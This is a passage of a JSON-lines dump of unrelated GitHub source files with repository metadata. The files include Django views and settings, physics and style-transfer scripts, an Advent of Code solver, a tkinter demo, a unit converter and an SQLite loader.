accounts = [\n (account, binary_search(account.pk, my_friends))\n for account in search_results\n ]\n else:\n accounts = [(account, False) for account in search_results]\n ctx[\"accounts\"] = accounts\n\n return render(request, \"account/account_search.html\", ctx)\n\n\n@login_required()\ndef account_update_view(request):\n \"\"\"View to updated account details\"\"\"\n ctx = {\"DATA_UPLOAD_MAX_SIZE\": settings.DATA_UPLOAD_MAX_MEMORY_SIZE}\n if request.method == \"POST\":\n form = AccountUpdateForm(\n request.POST, request.FILES, instance=request.user\n )\n if form.is_valid():\n form.save()\n return redirect(\"account:view\", request.user.username)\n else:\n form = AccountUpdateForm(instance=request.user)\n ctx[\"form\"] = form\n return render(request, \"account/account_update.html\", ctx)\n","repo_name":"abhie-lp/realtime-chat-django","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71866798514","text":"import json\nimport jsonpath\nimport requests\nimport openpyxl\n\nclass Common:\n\n def __init__(self, FileNamePath, SheetName):\n global ex, sh\n ex = openpyxl.load_workbook(FileNamePath)\n sh = ex[SheetName]\n\n def fetch_row_count(self):\n rows = sh.max_row\n return rows\n\n def fetch_column_count(self):\n col = sh.max_column\n return col\n\n def 
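`account_search_view` below calls `utils.search.binary_search(account.pk, my_friends)` on a pk-sorted tuple; assuming that helper follows the classic contract (sorted sequence in, membership bool out), it is equivalent to this bisect-based sketch:

```python
from bisect import bisect_left

def binary_search(value, seq) -> bool:
    i = bisect_left(seq, value)
    return i < len(seq) and seq[i] == value

assert binary_search(7, (1, 3, 7, 9))
assert not binary_search(4, (1, 3, 7, 9))
```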
fetch_key_names(self):\n c = sh.max_column #buscar cuantas hay en la hoja, se retornan 4 porque el libro tiene 4 columnas\n li=[] # se crea una lista vacia\n for i in range(1,c+1): # se ejecuta el ciclo de 1-5\n cell = sh.cell(row=1, column=i) # se recorre desde la primera fila y la columna es el valor i del ciclo\n li.insert(i-1, cell.value) # se inserta en la lista el valor\n return li\n\n def update_request_with_data(self, rowNumber, jsonRequest, keyList):\n c = sh.max_column\n for i in range(1,c+1): # se recorren todas las columnas xq cada fila tiene multiples columnas\n cell = sh.cell(rowNumber, column=i) #Buscar data de una columna en particular\n jsonRequest[keyList[i-1]] = cell.value\n return jsonRequest\n\n\n\n\n","repo_name":"JuanPulido90/TestingPython","sub_path":"DataDriven/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39131681167","text":"from mayan.settings.development import *\n# Debug Toolbar\n# from mayan.settings.development.ddt import *\n\nINSTALLED_APPS += (\n 'botech.edms',\n)\n\nif DEBUG:\n # See https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#configure-internal-ips\n # Set internal ips so that they work inside of a container as intended.\n import socket # only if you haven't already imported this\n hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\n INTERNAL_IPS = [ip[: ip.rfind(\".\")] + \".1\" for ip in ips] + [\"127.0.0.1\", \"10.0.2.2\"]\n\n# Debug toolbar configuration\n#\n# So far the only working way is to use the toolbar in one of the admin views\n# and find the requests via the history panel.\nRENDER_PANELS = False\nRESULTS_CACHE_SIZE = 300\nSHOW_COLLAPSED = True\n","repo_name":"johbo/botech-edms","sub_path":"botech/edms_dev/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14949078726","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 24 16:14:13 2023\n\n@author: gabriel\n\"\"\"\nimport numpy as np\nfrom superconductor import TrivialSparseSuperconductor, \\\n A1usSparseSuperconductor \nfrom junction import Junction, PeriodicJunction, PeriodicJunctionInXAndY\nfrom phase_functions import phase_soliton_antisoliton, phase_single_soliton\nimport scipy\nfrom functions import get_components\nimport matplotlib.pyplot as plt\n\n\nL_x = 150\nL_y = 150\nL = 50 #odd\nt = 1\nt_J = t/25\nDelta_p_A1us = t/5\nDelta_s_A1us = 0\nmu = -2*t\nn = 12 #number of eigenvalues in sparse diagonalization\nphi_external = 0\ny = np.arange(1, L_y+1)\ny_0 = (L_y-L)//2\ny_1 = (L_y+L)//2\ny_s = (L_y+10)//2\n\nPhi = phase_soliton_antisoliton(phi_external, y, y_0, y_1)\n# Phi = phase_single_soliton(phi_external, y, y_0)\n\nS_1 = A1usSparseSuperconductor(L_x, L_y, t, mu, Delta_s_A1us, Delta_p_A1us)\nS_2 = A1usSparseSuperconductor(L_x, L_y, t, mu, Delta_s_A1us, Delta_p_A1us)\n\n# J = PeriodicJunction(S_1, S_2, t_J, Phi)\n# J = Junction(S_1, S_2, t_J, Phi)\nJ = PeriodicJunctionInXAndY(S_1, S_2, t_J, Phi)\n\neigenvalues_sparse, eigenvectors_sparse = scipy.sparse.linalg.eigsh(J.matrix, k=n, sigma=0) \n\n#%% Probability density\nindex = np.arange(n) #which zero mode (less than k)\nprobability_density = []\nfor i in index:\n destruction_up, destruction_down, creation_down, creation_up = get_components(eigenvectors_sparse[:,i], J.L_x, J.L_y)\n 
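In the Django debug-toolbar settings above, `ip[: ip.rfind(".")] + ".1"` rewrites each container IP to its network gateway so the toolbar shows up inside Docker; a one-line check of the string surgery on a made-up container address:

```python
ip = "172.18.0.3"  # example only; real values come from socket.gethostbyname_ex
assert ip[: ip.rfind(".")] + ".1" == "172.18.0.1"
```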
probability_density.append((np.abs(destruction_up)**2 + np.abs(destruction_down)**2 + np.abs(creation_down)**2 + np.abs(creation_up)**2)/(np.linalg.norm(np.abs(destruction_up)**2 + np.abs(destruction_down)**2 + np.abs(creation_down)**2 + np.abs(creation_up)**2)))\n \nindex = 2\nfig, ax = plt.subplots()\nimage = ax.imshow(probability_density[index], cmap=\"Blues\", origin=\"lower\") #I have made the transpose and changed the origin to have xy axes as usually\nplt.colorbar(image)\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_title(\"Probability density\")\nax.text(0,0, rf'$index={index}$')\nplt.tight_layout()\n\nprobability_density_right = probability_density[index][:, S_1.L_x-1]/np.linalg.norm(probability_density[index][:, S_1.L_x-1]) #The y-axis is inverted\n\nfig, ax = plt.subplots()\nax.plot(y, probability_density_right, \"o\")\n#ax.plot(np.arange(1, L_y+1), probability_density[index][:, L_x//2-1])\nax.set_xlabel(r\"$\\ell$\")\nax.set_ylabel(\"Probability density at the junction\")\nax.text(5,25, rf'$index={index}$')\n\nnp.savez(\"L=100\", y=y, psi=probability_density_right)","repo_name":"gabriel-rodriguez-ruiz/fluxon","sub_path":"A1us_A1us_junction_diagonalization.py","file_name":"A1us_A1us_junction_diagonalization.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71396909554","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\nimport os\nimport random\nimport time\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom tensorflow.keras.applications.vgg19 import VGG19\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Input, Conv2D, BatchNormalization, ReLU, UpSampling2D\nfrom tensorflow.keras.optimizers import Adam\n\nfrom models import init_transform_model, init_loss_models, init_model\nfrom loss_functions import calc_style_loss, calc_content_loss\nfrom batch_generators import batch_generator\n\n\n\ndef trainer(alpha, beta, image_dim, batch_size, steps_per_epoch, epochs, coco_dirpath, save_weights_path, style_image_path):\n\t\"\"\" Train transfomation network to reconstruct input images in the desired style \"\"\"\n\n\t# Layers for loss calculations\n\tcontent_layers = ['block3_conv3']\n\tstyle_layers = ['block1_conv2', 'block2_conv2', 'block3_conv3', 'block4_conv3']\n\n\tcontent_losses = [calc_content_loss]\n\tstyle_losses = [calc_style_loss, calc_style_loss, calc_style_loss, calc_style_loss]\n\n\tcontent_weights = [alpha]\n\tstyle_weights = [beta, beta, beta, beta]\n\n\n\t# Initiate models\n\ttransform_model = init_transform_model()\n\tloss_model, content_loss_model, style_loss_model = init_loss_models(content_layers, style_layers)\n\tmodel = init_model(transform_model, loss_model)\n\n\t# Load style image and extract featuremaps\n\tstyle_image = cv2.imread(style_image_path).astype(np.float32) / 255\n\tstyle_image_resized = cv2.resize(style_image, (image_dim, image_dim))\n\tstyle_image_batch = np.repeat(np.expand_dims(style_image_resized, axis=0), repeats=batch_size, axis=0)\n\n\tstyle_featuremaps = style_loss_model.predict(style_image_batch)\n\n\n\t# Generator to train reconet\n\tbatch_gen = batch_generator(coco_dirpath, content_loss_model, style_featuremaps, image_dim, batch_size)\n\t(a, b) = next(batch_gen) # Tensorflow bug: will crash without calling the generator once before training\n\n\n\tmodel.compile(optimizer='adam', loss=content_losses+style_losses, 
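The junction script above diagonalizes with `scipy.sparse.linalg.eigsh(..., sigma=0)`; shift-invert mode returns the eigenvalues closest to zero, which is where the bound states of interest sit. A minimal demo on a small diagonal matrix whose spectrum is known by construction:

```python
import numpy as np
from scipy.sparse import diags
from scipy.sparse.linalg import eigsh

H = diags([-2.0, -1.0, 0.5, 1.0, 3.0]).tocsc()  # eigenvalues = diagonal entries
vals, _ = eigsh(H, k=2, sigma=0)                # shift-invert: two nearest zero
assert sorted(np.round(vals, 6)) == [-1.0, 0.5]
```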
loss_weights=content_weights+style_weights)\n\n\tmodel.fit_generator(\n\t\tgenerator=batch_gen,\n\t\tsteps_per_epoch=steps_per_epoch,\n\t\tepochs=epochs)\n\n\ttransform_model.save_weights(save_weights_path)\n\n\n\n\nif __name__ == '__main__':\n\n\t# Input arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--alpha')\n\tparser.add_argument('--beta')\n\tparser.add_argument('--image_dim')\n\tparser.add_argument('--batch_size')\n\tparser.add_argument('--steps_per_epoch')\n\tparser.add_argument('--epochs')\n\tparser.add_argument('--coco_dirpath')\n\tparser.add_argument('--save_weights_path')\n\tparser.add_argument('--style_image_path')\n\targs = parser.parse_args()\n\t\n\t# Call the trainer function with parameters\n\ttrainer(\n\t\talpha = int(args.alpha),\n\t\tbeta = int(args.beta),\n\t\timage_dim = int(args.image_dim),\n\t\tbatch_size = int(args.batch_size),\n\t\tsteps_per_epoch = int(args.steps_per_epoch),\n\t\tepochs = int(args.epochs),\n\t\tcoco_dirpath = args.coco_dirpath,\n\t\tsave_weights_path = args.save_weights_path,\n\t\tstyle_image_path = args.style_image_path)","repo_name":"caseypeat/Neural-Transfer-Realtime","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"8865818572","text":"from lpp import *\nRAW = fasta_check(open(sys.argv[1],'rU'))\nEND = open(sys.argv[2],'w')\nNEW = open(sys.argv[4],'w')\nTAB = open(sys.argv[3],'w')\nall_data = Ddict()\ntop_data = {}\nall_new = {}\nfor t,s in RAW:\n\tgene = re.search(\"gene=(\\S+)\",t)\n\tref_gene_id = re.search( \"ref_gene_id=(\\S+)\",t )\n\tif gene:\n\t\tgene = re.search(\"gene=(\\S+)\",t).group(1)\n\telse:\n\t\tgene = t[1:].split()[0]\n\tif ref_gene_id:\n\t\tgene = ref_gene_id.group(1)\n\tif \"ref_gene_id\" not in t:\n\t\tall_new [gene] = \"\"\n\n\trna_name = re.search(\"^\\>(\\S+)\",t).group(1)\n\tall_data[gene][rna_name]=\"\"\n\tif gene not in top_data:\n\t\ttop_data[gene]=[len(s),rna_name,s]\n\telse:\n\t\tif len(s) >top_data[gene][0]:\n\t\t\ttop_data[gene]=[len(s),rna_name,s]\n\t\t\t\t\n\t\t\t\t\nfor key in top_data:\n\tEND.write('>'+key+'\\n'+top_data[key][-1])\n\tTAB.write( key+'\\t'+ top_data[key][1]+'\\t'+'; '.join( all_data[key] ) )\n\tif key in all_new:\n\t\tTAB.write(\"\\tNew\\n\")\n\t\tNEW.write('>'+key+'\\n'+top_data[key][-1])\n\telse:\n\t\tTAB.write(\"\\t-\\n\")\n\t\t\n\t\t","repo_name":"lpp1985/lpp_Script","sub_path":"StringTieCDS_Sep.py","file_name":"StringTieCDS_Sep.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"23631626698","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('statscollect_db', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='footballpersonalstats',\n name='penalties_saved',\n field=models.SmallIntegerField(null=True, blank=True),\n ),\n ]\n","repo_name":"matthieucham/statscollect","sub_path":"statscollect_db/migrations/0002_footballpersonalstats_penalties_saved.py","file_name":"0002_footballpersonalstats_penalties_saved.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33781168851","text":"from tkinter import *\nlogs = 
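The `trainer.py` CLI above declares every flag untyped and casts with `int(args.alpha)` at the call site; argparse can do the coercion itself via `type=`, which is the usual idiom (a hedged alternative, not a change to the original script):

```python
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--alpha", type=int, default=1)
parser.add_argument("--image_dim", type=int, default=256)
args = parser.parse_args(["--alpha", "7"])
assert args.alpha == 7 and isinstance(args.image_dim, int)
```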
Tk()\nlogs.geometry(\"400x400+300+300\")\n\n\n\n\n\ndef Adarbība ():\n print(\"Paldies!\")\ndef Bdarbība():\n print(\"Au! Man sāp!\")\n\npogaA = Button(text='ķļikšņi te!', command=Adarbība)\npogaB = Button(text='Neķļikšņi te!', command=Bdarbība)\n\npogaB.pack(side=TOP)\npogaA.pack(side=BOTTOM)\n\n\nlogs.mainloop()\n","repo_name":"AleksandrZelukin/macibu_programmas","sub_path":"Grafiskas_programmas/Logs_terminal.py","file_name":"Logs_terminal.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"lv","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34616472966","text":"import re, itertools\nfrom timeit import default_timer\n\nFILE = \"day19_input.txt\"\n\nrule_regex = re.compile(\"^(?P\\d+): (?P.+)$\")\nbase_regex = re.compile('^\"([a-z])\"$')\n\n\nclass Rule:\n def __init__(self, base, sub_rules):\n self.base = base\n self.sub_rules = sub_rules\n self.rule_set = None\n self.contributing_rules = set()\n\n def __repr__(self):\n if self.base is not None:\n return f\"{self.base}\"\n elif self.sub_rules is not None:\n return f\"{self.sub_rules}\"\n else:\n return \"Null rule\"\n\n def construct_alternatives(self, all_rules):\n if self.rule_set is not None:\n return list(self.rule_set), set(self.contributing_rules)\n\n self.rule_set = list()\n if self.base is not None:\n self.rule_set.append(self.base)\n else:\n assert self.sub_rules is not None\n for alternative in self.sub_rules:\n expanded_sub_rules = list()\n for rule_index in alternative:\n self.contributing_rules.add(rule_index)\n expanded_rule, contributing_sub_rules = all_rules[\n rule_index\n ].construct_alternatives(all_rules)\n expanded_sub_rules.append(expanded_rule)\n self.contributing_rules = (\n self.contributing_rules | contributing_sub_rules\n )\n combined_sub_rules = itertools.product(*expanded_sub_rules)\n for rule in combined_sub_rules:\n self.rule_set.append(\"\".join(rule))\n return (list(self.rule_set), set(self.contributing_rules))\n\n # Returns True if message matches rule, False otherwise\n # Can only be called after construct_alternatives\n def apply_rule_to_message(self, message):\n for rule in self.rule_set:\n if rule == message:\n return True\n return False\n\n\ndef read_file(filename):\n rules = dict()\n messages = list()\n parsing_rules = True\n with open(filename, \"r\") as f:\n for l in f:\n if l.strip() == \"\":\n parsing_rules = False\n elif parsing_rules:\n rule_match = re.match(rule_regex, l.strip())\n assert rule_match is not None\n base_match = re.match(base_regex, rule_match.group(\"rule\"))\n base = None\n sub_rules = None\n if base_match:\n base = base_match.group(1)\n else:\n sub_rules = [\n x.strip().split(\" \")\n for x in rule_match.group(\"rule\").split(\"|\")\n ]\n rules[rule_match.group(\"index\")] = Rule(base, sub_rules)\n else:\n messages.append(l.strip())\n return rules, messages\n\n\n# OK Part 2 - so 0 is made from 8 11, 8 is an arbitrary number of 42s,\n# 11 is N 42s followed by N 31s, where N is some integer. 42s and 31s are\n# strings of length 8. That means to find the messages that match 0, they must\n# start with 2 42s, then each 8 bytes further must match either a 42 or a 31\n# (if a 42, then next 8 chars can match a 42 or a 31, but after a 31, next 8\n# chars can only match a 31). finally, the last 8 chars need to be in the 31\n# set. 
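(Rule 8 is one or more 42s and rule 11 is N 42s then N 31s, so e.g. a five-chunk message may split as 42,42,42,42,31 or 42,42,42,31,31 but never as 42,42,31,31,31.) 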
There also have to be more 42s than 31s by the pattern\ndef apply_part2_to_message(message, rules):\n # print(f\"Message: {message}\")\n rule42_set = set(rules[\"42\"].rule_set)\n rule31_set = set(rules[\"31\"].rule_set)\n\n length = len(rules[\"42\"].rule_set[0])\n if (len(message) % length != 0) or (len(message) < (3 * length)):\n # print(f\"Message too short: {len(message)}\")\n return False\n\n if message[0:length] not in rule42_set:\n # print(f\"First {length} chars don't match rule42: {message[0:length]}\")\n return False\n\n if message[length : (2 * length)] not in rule42_set:\n # print(f\"Second {length} chars don't match rule42: {message[length:2*length]}\")\n return False\n\n if message[-length:] not in rule31_set:\n # print(f\"Last {length} chars don't match rule31: {message[-length:]}\")\n return False\n\n count31 = 0\n count42 = 2\n\n i = 2 * length\n hit_31s = False\n while (i + length) <= len(message):\n # print(f\"i = {i} checking: {message[i:i+length]}\")\n if not hit_31s:\n # print(f\"Not hit 31s yet\")\n if message[i : i + length] not in rule42_set:\n # print(f\"Not in rule 42 set\")\n if message[i : i + length] not in rule31_set:\n # print(f\"Not in rule 31 set\")\n return False\n else:\n # print(f\"In rule 31 set\")\n count31 += 1\n hit_31s = True\n else:\n count42 += 1\n else:\n # print(f\"On the 31s\")\n if message[i : i + length] not in rule31_set:\n # print(f\"Not in rule 31 set (2)\")\n return False\n count31 += 1\n i += length\n\n if count42 > count31:\n # print(f\"Message checks out\")\n return True\n # else:\n # print(f\"Too many 31s - impossible pattern: {count31} 31s vs {count42} 42s\")\n\n\nrules, messages = read_file(FILE)\n# print(f\"Rules: {rules}\")\n# print(f\"Messages: {messages}\")\n\n# Finish initialization of the rules\nfor rule in rules.values():\n rule.construct_alternatives(rules)\n\ncount = 0\nfor message in messages:\n if rules[\"0\"].apply_rule_to_message(message):\n count += 1\nprint(f\"Part 1 count: {count}\")\n\n# print(f\"Rule 8 expanded: length {len(rules['8'].rule_set)}: {rules['8'].rule_set[:20]}\")\n# print(f\"Rule 8 contributing rules: {rules['8'].contributing_rules}\")\n# print(f\"Rule 11 expanded: length {len(rules['11'].rule_set)}: {rules['11'].rule_set[:20]}\")\n# print(f\"Rule 11 contributing rules: {rules['11'].contributing_rules}\")\n# print(f\"Rule 31 expanded: length {len(rules['31'].rule_set)}: {rules['31'].rule_set}\")\n# print(f\"Rule 31 contributing rules: {rules['31'].contributing_rules}\")\n# print(f\"Rule 42 expanded: length {len(rules['42'].rule_set)}: {rules['42'].rule_set}\")\n# print(f\"Rule 42 contributing rules: {rules['42'].contributing_rules}\")\n# print(f\"Rule 0 expanded: length {len(rules['0'].rule_set)}: {rules['0'].rule_set[:20]}\")\n# print(f\"Rule 0 contributing rules: {rules['0'].contributing_rules}\")\n# print(f\"Max message len: {max([len(x) for x in messages])}\")\nstart = default_timer()\ncount2 = 0\nfor message in messages:\n if apply_part2_to_message(message, rules):\n count2 += 1\nstop = default_timer()\nprint(f\"Part 2 count: {count2}\")\nprint(f\"Part 2 took: {stop-start}\")\n","repo_name":"mikeramage/aoc2020","sub_path":"python/day19/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2699763006","text":"from os.path import basename\n\nfrom abc import ABC, abstractmethod\n\n# Classe Adaptateur.\n# Adaptateur entre le RSV (Middleware) et les exports.\n# Objectif, 
traiter les rapports et transmettre les données sous un format \n# standardisé vers le RSV.\nclass Adaptateur(ABC):\n\n    #############################################################################\n    ########################     Static variables      ########################\n    #############################################################################\n    \n    FORMAT_DATE_HEURE = \"%Y-%m-%d %H:%M:%S\"\n    TRAITEMENT_PREFIX = \"traite_\"\n    TRAITEMENT_SUFIX = \"\"\n\n    SOURCE_ORADAD = \"Oradad\"\n    SOURCE_CSV = \"CSV\"\n    SOURCE_DB = \"DB\"\n    SOURCE_CONFIG = \"config\"\n    SOURCE_CASSIS = \"CASSIS\"\n    \n    \n    \n    \n    #############################################################################\n    ##########################     Private methods     ##########################\n    #############################################################################\n    \n    \n    \n    # Constructor\n    def __init__(self, adaptateur_CSV):\n        print(\"Adaptateur - Init - Begin\")\n        \n        self.adaptateur_CSV = adaptateur_CSV\n        \n        print(\"Adaptateur - Init - End\")\n    \n    \n    \n    # Opens a file (report).\n    # (On error) Raises an exception;\n    # (Otherwise) Returns the opened file.\n    def __open_file__(self, path, mode):\n        \n        try:\n            print(\"Opening file \" + path + \"...\")\n            open_file = open(path, mode)\n            \n        except:\n            raise Exception(\"Error while opening file \" + path)\n        else:\n            print(\"File \" + path + \" opened.\")\n            return open_file\n    \n    \n    \n    # Closes a file (report).\n    # (On error) Raises an exception;\n    # (Otherwise) Returns None.\n    def __close_file__(self, open_file):\n        \n        try:\n            print(\"Closing file \" + open_file.name + \"...\")\n            open_file.close()\n            \n        except:\n            raise Exception(\"Error while closing file \" + open_file.name)\n        \n        else:\n            print(\"File \" + open_file.name +\" closed.\")\n    \n    \n    \n    # Gets the file name from its full path.\n    def __get_path_basename__(self, path):\n        return basename(path)\n    \n    \n    \n    \n    \n    \n    \n    # Finds the index of the start of the block and the index of its end\n    # returns index_debut_bloc, index_fin_bloc\n    # Returns -1 on error\n    def __trouve_debut_fin_bloc__(self, \n                                  texte, \n                                  delemiteur_bloc_begin, \n                                  delemiteur_bloc_end, \n                                  index_debut=0, \n                                  index_fin=-1\n                                  ):\n        \n        \n        if index_fin < 0: index_fin = len(texte)\n        \n        index_debut_bloc = 0\n        index_fin_bloc = 0\n        \n        compteur_ouverture_bloc = 0\n        index = index_debut\n        \n        \n        \n        while index < index_fin:\n            if texte[index] == delemiteur_bloc_begin:\n                compteur_ouverture_bloc = 1\n                index_debut_bloc = index\n                break\n            else:\n                # Advance the scan index\n                index = index + 1\n        \n        \n        \n        \n        # While blocks are still open\n        while compteur_ouverture_bloc > 0 and index < index_fin:\n            \n            # Advance the scan index\n            index = index + 1\n            \n            if texte[index] == delemiteur_bloc_begin:\n                compteur_ouverture_bloc = compteur_ouverture_bloc + 1\n            elif texte[index] == delemiteur_bloc_end:\n                compteur_ouverture_bloc = compteur_ouverture_bloc - 1\n        \n        if index >= index_fin: index_fin_bloc = -1\n        \n        index_fin_bloc = index + 1\n        \n        return index_debut_bloc, index_fin_bloc\n    \n    \n    \n    def __trouve_debut_fin_bloc_find__(self, \n                                       texte, \n                                       delemiteur_bloc_begin, \n                                       delemiteur_bloc_end, \n                                       index_debut=0, \n                                       index_fin=-1\n                                       ):\n        \n        \n        if index_fin < 0: index_fin = len(texte)\n        \n        index_debut_bloc = -1\n        index_fin_bloc = -1\n        \n        compteur_ouverture_bloc = 0\n        \n        \n        index = texte.find(\n            delemiteur_bloc_begin, \n            index_debut, \n            index_fin\n        )\n        \n        index_debut_bloc = index\n        \n        if index >= 0:\n            compteur_ouverture_bloc = 1\n        \n        \n        \n        \n        index_debut_find = texte.find(\n            delemiteur_bloc_begin, \n            index + 
len(delemiteur_bloc_begin), \n index_fin\n )\n \n index_fin_find = texte.find(\n delemiteur_bloc_end, \n index + len(delemiteur_bloc_begin), \n index_fin\n )\n \n if index_fin_find < 0: \n index_fin_bloc = -1\n return index_debut_bloc, index_fin_bloc\n \n \n \n \n # Tant que des blocs sont ouverts\n while compteur_ouverture_bloc > 0 and index_debut_find >= 0:\n \n index_fin_bloc = index_fin_find\n \n if index_fin_find < 0: \n index_fin_bloc = -1\n return index_debut_bloc, index_fin_bloc\n \n \n \n if index_debut_find >= 0 and index_debut_find < index_fin_find:\n compteur_ouverture_bloc = compteur_ouverture_bloc + 1\n index_debut_find = index_debut_find + len(delemiteur_bloc_begin)\n elif index_fin_find >= 0:\n compteur_ouverture_bloc = compteur_ouverture_bloc - 1\n index_debut_find = index_fin_find + len(delemiteur_bloc_end)\n \n \n if compteur_ouverture_bloc == 0:\n index_fin_bloc = index_fin_find\n return index_debut_bloc, index_fin_bloc\n \n index_debut_find = texte.find(\n delemiteur_bloc_begin, \n index_debut_find, \n index_fin\n )\n \n index_fin_find = texte.find(\n delemiteur_bloc_end, \n index_debut_find, \n index_fin\n )\n \n return index_debut_bloc, index_fin_bloc\n \n \n \n \n \n #############################################################################\n ########################## Public methods ##########################\n #############################################################################\n \n # Méthode abstraite.\n # Traite les rapports pour transmettre les données sous un fomat standardisé \n # vers le RSV.\n @abstractmethod\n def traitement_fichier(self):\n pass\n \n \n","repo_name":"get-me-a-cookie/SSI_Pomme","sub_path":"adaptateur/adaptateur.py","file_name":"adaptateur.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5739441487","text":"from time import time\n\n\ndef measure_time(fn):\n def wrapper(*args, **kwargs):\n start = time()\n result = fn(*args, **kwargs)\n end = time()\n print(end - start)\n\n return result\n return wrapper\n\n\n@measure_time\ndef sum_number_to(to_number):\n result = 0\n for n in range(to_number):\n result += n\n return result\n\nsum_number_to(1000000)","repo_name":"dimobs/pythonProject2023","sub_path":"Decorators/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31184237404","text":"print(\"\\n\\nWELCOME TO YOUR UNIT CONVERTER\\n\")\n\n\ndef main():\n def units():\n unit = input(\n \"choose an option please \\n\\n\"\n \"1. cm to inch \\n\"\n \"2. inch to cm \\n\"\n \"3. m to feet \\n\"\n \"4. feet to m \\n\"\n \"5. km to mile \\n\"\n \"6. mile to km \\n\"\n \"7. kg to pound \\n\"\n \"8. pound to kg \\n\"\n \"9. Celsius to Fahrenheit \\n\"\n \"10. Fahrenheit to Celsius \\n\"\n \"11. Celsius to Kelvin \\n\"\n \"12. Kelvin to Celsius \\n\"\n \"13. Fahrenheit to Kelvin \\n\"\n \"14. 
Kelvin to Fahrenheit \\n\\n\"\n \"your option: \"\n )\n while unit not in (\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\"):\n print(\"Wrong choice, please choose again\\n\")\n units()\n\n number = float(input(\"enter the value you want to convert: \"))\n\n if unit == \"1\":\n print(number / 2.54, \"in\")\n elif unit == \"2\":\n print(number * 2.54, \"cm\")\n elif unit == \"3\":\n print(number * 3.281, \"ft\")\n elif unit == \"4\":\n print(number / 3.281, \"m\")\n elif unit == \"5\":\n print(number / 1.609, \"mile\")\n elif unit == \"6\":\n print(number * 1.609, \"km\")\n elif unit == \"7\":\n print(number * 2.20462, \"lb\")\n elif unit == \"8\":\n print(number / 2.20462, \"kg\")\n elif unit == \"9\":\n print((number * 9 / 5) + 32, \"F\")\n elif unit == \"10\":\n print((number - 32) * 5 / 9, \"C\")\n elif unit == \"11\":\n print(number + 273.15, \"K\")\n elif unit == \"12\":\n print(number - 273.15, \"C\")\n elif unit == \"13\":\n print((number - 32) * 5 / 9 + 273.15, \"K\")\n elif unit == \"14\":\n print(((number - 273.15) * 9 / 5) + 32, \"F\")\n\n restart = input(\"Do you want to start again? y / n: \")\n if restart == \"y\":\n main()\n elif restart == \"n\":\n exit()\n units()\nmain()\n","repo_name":"RubarMo/unit-converter","sub_path":"Unit Converter.py","file_name":"Unit Converter.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"31919825980","text":"import sqlite3\nimport os\n\n\ndef sanitize_table_name(table_name):\n \"\"\"\n Sanitize a table name by replacing all characters that are not alphanumeric\n or underscores with underscores.\n\n Args:\n table_name (str): The table name to sanitize.\n\n Returns:\n str: The sanitized table name.\n \"\"\"\n sanitized_name = \"\"\n for char in table_name:\n if char.isalnum() or char == \"_\":\n sanitized_name += char\n else:\n sanitized_name += \"_\"\n\n # Ensure the resulting name starts with an alphabetic character\n if not sanitized_name[0].isalpha():\n sanitized_name = \"table_\" + sanitized_name\n\n return sanitized_name\n\n\ndef load_db_data(data_file_path, table_name):\n \"\"\"\n Load data from an SQLite database table into a list of dictionaries.\n\n Args:\n data_file_path (str): The path to the SQLite database file.\n table_name (str): The name of the table from which data will be loaded.\n\n Returns:\n list:\n A list of dictionaries where each dictionary represents a row of\n data.\n The keys in each dictionary correspond to the column names, and the\n values are the column values for that row.\n\n Raises:\n FileNotFoundError:\n If the SQLite file specified by data_file_path does not exist.\n sqlite3.OperationalError:\n If there is an issue with SQLite database operations.\n\n Example:\n data = load_db_data(\"my_database.db\", \"my_table\")\n \"\"\"\n\n # Check if the SQLite file exists\n if not os.path.exists(data_file_path):\n raise FileNotFoundError(\n f\"SQLite file '{data_file_path}' does not exist.\"\n )\n\n # Connect to the SQLite database\n conn = sqlite3.connect(data_file_path)\n cursor = conn.cursor()\n\n # Sanitize the table_name before using it in the query\n table_name = sanitize_table_name(table_name)\n\n # Fetch column names from the table\n cursor.execute(f\"PRAGMA table_info({table_name})\")\n columns = [column[1] for column in 